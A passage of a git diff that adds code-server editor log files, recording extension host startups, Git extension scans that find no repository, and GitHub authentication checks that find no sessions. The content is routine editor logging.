+2026-01-26 07:13:41.598 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.598 [info] Got 0 sessions for ... +2026-01-26 07:13:41.598 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.598 [info] Got 0 sessions for ... +2026-01-26 07:13:41.598 [info] Getting sessions for all scopes... +2026-01-26 07:13:41.598 [info] Got 0 sessions for ... +2026-01-26 07:13:42.831 [info] Getting sessions for all scopes... +2026-01-26 07:13:42.831 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github/GitHub.log new file mode 100755 index 0000000..2f7fc4f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 07:13:41.738 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteexthost.log new file mode 100755 index 0000000..e7eec25 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-25 23:36:19.382 [info] Extension host with pid 1219 started +2026-01-25 23:36:19.391 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-53e2bffc/vscode.lock': Lock acquired. +2026-01-25 23:36:19.482 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-25 23:36:19.560 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-25 23:36:19.571 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-25 23:36:19.571 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-25 23:36:19.733 [info] Eager extensions activated +2026-01-25 23:36:19.733 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-25 23:36:19.733 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-25 23:36:23.066 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-25 23:38:38.902 [info] Extension host terminating: received terminate message from renderer +2026-01-25 23:38:38.904 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-53e2bffc/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-25 23:38:38.921 [info] Extension host with pid 1219 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.git/Git.log new file mode 100755 index 0000000..ee513ee --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.git/Git.log @@ -0,0 +1,13 @@ +2026-01-25 23:36:19.765 [info] [main] Log level: Info +2026-01-25 23:36:19.765 [info] [main] Validating found git in: "git" +2026-01-25 23:36:19.765 [info] [main] Using git "2.39.5" from "git" +2026-01-25 23:36:19.765 [info] [Model][doInitialScan] Initial repository scan started +2026-01-25 23:36:19.765 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:36:19.765 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-25 23:36:19.765 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-25 23:36:21.024 [info] > git rev-parse --show-toplevel [3ms] +2026-01-25 23:36:21.024 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-25 23:36:22.882 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:36:22.882 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-25 23:36:23.172 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:36:23.172 [info] fatal: not a git repository (or any of the parent directories): .git diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..690cd71 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-25 23:36:19.667 [info] Reading sessions from keychain... +2026-01-25 23:36:19.667 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.667 [info] Got 0 sessions for ... +2026-01-25 23:36:19.667 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.667 [info] Got 0 sessions for ... +2026-01-25 23:36:19.667 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.667 [info] Got 0 sessions for ... +2026-01-25 23:36:19.667 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:19.668 [info] Getting sessions for all scopes... +2026-01-25 23:36:19.668 [info] Got 0 sessions for ... +2026-01-25 23:36:21.073 [info] Getting sessions for all scopes... +2026-01-25 23:36:21.073 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github/GitHub.log new file mode 100755 index 0000000..0079c6c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-25 23:36:19.796 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteexthost.log new file mode 100755 index 0000000..ae78694 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/remoteexthost.log @@ -0,0 +1,15 @@ +2026-01-25 23:38:41.207 [info] Extension host with pid 2066 started +2026-01-25 23:38:41.222 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Lock acquired. +2026-01-25 23:38:41.297 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-25 23:38:41.298 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-25 23:38:41.418 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*' +2026-01-25 23:38:41.435 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-25 23:38:41.511 [info] Eager extensions activated +2026-01-25 23:38:41.511 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-25 23:38:41.512 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-25 23:38:45.469 [info] ExtensionService#_doActivateExtension vscode.git, startup: false, activationEvent: 'api', root cause: vscode.github +2026-01-25 23:38:56.983 [info] ExtensionService#_doActivateExtension vscode.terminal-suggest, startup: false, activationEvent: 'onTerminalShellIntegration:*' +2026-01-25 23:39:42.560 [info] ExtensionService#_doActivateExtension vscode.npm, startup: false, activationEvent: 'onTerminalQuickFixRequest:ms-vscode.npm-command' +2026-01-26 00:08:21.924 [info] Extension host terminating: received terminate message from renderer +2026-01-26 00:08:21.925 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/70d739db/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 00:08:21.962 [info] Extension host with pid 2066 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.git/Git.log new file mode 100755 index 0000000..15ae03c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.git/Git.log @@ -0,0 +1,89 @@ +2026-01-25 23:38:45.603 [info] [main] Log level: Info +2026-01-25 23:38:45.604 [info] [main] Validating found git in: "git" +2026-01-25 23:38:45.604 [info] [main] Using git "2.39.5" from "git" +2026-01-25 23:38:45.604 [info] [Model][doInitialScan] Initial repository scan started +2026-01-25 23:38:45.604 [info] > git rev-parse --show-toplevel [2ms] +2026-01-25 23:38:45.604 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.608 [info] > git rev-parse --show-toplevel [4ms] +2026-01-25 23:38:45.608 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.613 [info] > git rev-parse --show-toplevel [2ms] +2026-01-25 23:38:45.613 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.617 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.617 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.622 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.622 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.625 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.626 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.629 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.629 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.633 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.633 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.637 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.637 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.641 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.641 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.645 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.645 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.648 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.649 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.652 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:45.652 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:45.655 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-25 23:38:56.813 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:38:56.813 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:38:57.128 [info] > git rev-parse --show-toplevel [2ms] +2026-01-25 23:38:57.128 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:45:18.451 [info] > git rev-parse --show-toplevel [2ms] +2026-01-25 23:45:18.451 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:45:45.059 [info] > git rev-parse --show-toplevel [4ms] +2026-01-25 23:45:45.059 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:48:46.336 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:48:46.336 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:52:55.444 [info] > git rev-parse --show-toplevel [3ms] +2026-01-25 23:52:55.444 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:55:04.175 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:55:04.175 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-25 23:56:21.566 [info] > git rev-parse --show-toplevel [1ms] +2026-01-25 23:56:21.566 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:02:49.021 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 00:02:49.021 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:02:58.216 [info] > git rev-parse --show-toplevel [3ms] +2026-01-26 00:02:58.216 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:02:59.161 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 00:02:59.161 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:03:34.592 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 00:03:34.593 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:03:49.669 [info] > git rev-parse --show-toplevel [4ms] +2026-01-26 00:03:49.669 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:04:46.985 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 00:04:46.985 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). +2026-01-26 00:04:58.409 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 00:04:58.409 [info] fatal: not a git repository (or any parent up to mount point /opt) +Stopping at filesystem boundary (GIT_DISCOVERY_ACROSS_FILESYSTEM not set). diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..c3e235c --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-25 23:38:41.482 [info] Reading sessions from keychain... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:41.482 [info] Getting sessions for all scopes... +2026-01-25 23:38:41.482 [info] Got 0 sessions for ... +2026-01-25 23:38:43.014 [info] Getting sessions for all scopes... +2026-01-25 23:38:43.014 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github/GitHub.log new file mode 100755 index 0000000..d43a41e --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-25 23:38:41.561 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteexthost.log new file mode 100755 index 0000000..5dc76ac --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/remoteexthost.log @@ -0,0 +1,13 @@ +2026-01-26 00:10:13.821 [info] Extension host with pid 11311 started +2026-01-26 00:10:13.831 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-ad48359/vscode.lock': Lock acquired. +2026-01-26 00:10:14.075 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 00:10:14.076 [info] ExtensionService#_doActivateExtension vscode.emmet, startup: false, activationEvent: 'onLanguage' +2026-01-26 00:10:14.295 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 00:10:14.458 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 00:10:14.459 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 00:10:14.655 [info] Eager extensions activated +2026-01-26 00:10:14.655 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 00:10:14.655 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 03:10:47.659 [info] Extension host terminating: renderer disconnected for too long (1) +2026-01-26 03:10:47.660 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-ad48359/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 03:10:47.690 [info] Extension host with pid 11311 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.git/Git.log new file mode 100755 index 0000000..5a2ea00 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.git/Git.log @@ -0,0 +1,7 @@ +2026-01-26 00:10:14.775 [info] [main] Log level: Info +2026-01-26 00:10:14.775 [info] [main] Validating found git in: "git" +2026-01-26 00:10:14.775 [info] [main] Using git "2.39.5" from "git" +2026-01-26 00:10:14.775 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 00:10:14.775 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 00:10:14.776 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-26 00:10:14.776 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..c1378a0 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 00:10:14.547 [info] Reading sessions from keychain... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.547 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.547 [info] Got 0 sessions for ... +2026-01-26 00:10:14.587 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.587 [info] Got 0 sessions for ... +2026-01-26 00:10:14.636 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.636 [info] Got 0 sessions for ... +2026-01-26 00:10:14.636 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.636 [info] Got 0 sessions for ... +2026-01-26 00:10:14.636 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.636 [info] Got 0 sessions for ... +2026-01-26 00:10:14.636 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.636 [info] Got 0 sessions for ... +2026-01-26 00:10:14.636 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.636 [info] Got 0 sessions for ... +2026-01-26 00:10:14.767 [info] Getting sessions for all scopes... +2026-01-26 00:10:14.767 [info] Got 0 sessions for ... diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github/GitHub.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github/GitHub.log new file mode 100755 index 0000000..5491c68 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github/GitHub.log @@ -0,0 +1 @@ +2026-01-26 00:10:14.777 [info] Log level: Info diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteExtHostTelemetry.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteExtHostTelemetry.log new file mode 100755 index 0000000..e69de29 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteexthost.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteexthost.log new file mode 100755 index 0000000..51ae496 --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/remoteexthost.log @@ -0,0 +1,12 @@ +2026-01-26 07:11:58.059 [info] Extension host with pid 43703 started +2026-01-26 07:11:58.066 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-ad48359/vscode.lock': Lock acquired. +2026-01-26 07:11:58.164 [info] ExtensionService#_doActivateExtension vscode.github-authentication, startup: false, activationEvent: 'onAuthenticationRequest:github' +2026-01-26 07:11:58.244 [info] ExtensionService#_doActivateExtension vscode.git-base, startup: true, activationEvent: '*', root cause: vscode.git +2026-01-26 07:11:58.264 [info] ExtensionService#_doActivateExtension vscode.git, startup: true, activationEvent: '*' +2026-01-26 07:11:58.265 [info] ExtensionService#_doActivateExtension vscode.github, startup: true, activationEvent: '*' +2026-01-26 07:11:58.438 [info] Eager extensions activated +2026-01-26 07:11:58.438 [info] ExtensionService#_doActivateExtension vscode.debug-auto-launch, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:11:58.438 [info] ExtensionService#_doActivateExtension vscode.merge-conflict, startup: false, activationEvent: 'onStartupFinished' +2026-01-26 07:12:17.305 [info] Extension host terminating: received terminate message from renderer +2026-01-26 07:12:17.305 [info] Lock '/root/.local/share/code-server/User/workspaceStorage/-ad48359/vscode.lock': Marking the lockfile as scheduled to be released in 6000 ms. +2026-01-26 07:12:17.330 [info] Extension host with pid 43703 exiting with code 0 diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.git/Git.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.git/Git.log new file mode 100755 index 0000000..86df6aa --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.git/Git.log @@ -0,0 +1,9 @@ +2026-01-26 07:11:58.479 [info] [main] Log level: Info +2026-01-26 07:11:58.479 [info] [main] Validating found git in: "git" +2026-01-26 07:11:58.479 [info] [main] Using git "2.39.5" from "git" +2026-01-26 07:11:58.479 [info] [Model][doInitialScan] Initial repository scan started +2026-01-26 07:11:58.479 [info] > git rev-parse --show-toplevel [1ms] +2026-01-26 07:11:58.479 [info] fatal: not a git repository (or any of the parent directories): .git +2026-01-26 07:11:58.479 [info] [Model][doInitialScan] Initial repository scan completed - repositories (0), closed repositories (0), parent repositories (0), unsafe repositories (0) +2026-01-26 07:12:00.320 [info] > git rev-parse --show-toplevel [2ms] +2026-01-26 07:12:00.320 [info] fatal: not a git repository (or any of the parent directories): .git diff --git a/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github-authentication/GitHub Authentication.log b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github-authentication/GitHub Authentication.log new file mode 100755 index 0000000..895cb4f --- /dev/null +++ b/.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github-authentication/GitHub Authentication.log @@ -0,0 +1,33 @@ +2026-01-26 07:11:58.340 [info] Reading sessions from keychain... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 07:11:58.340 [info] Getting sessions for all scopes... +2026-01-26 07:11:58.340 [info] Got 0 sessions for ... +2026-01-26 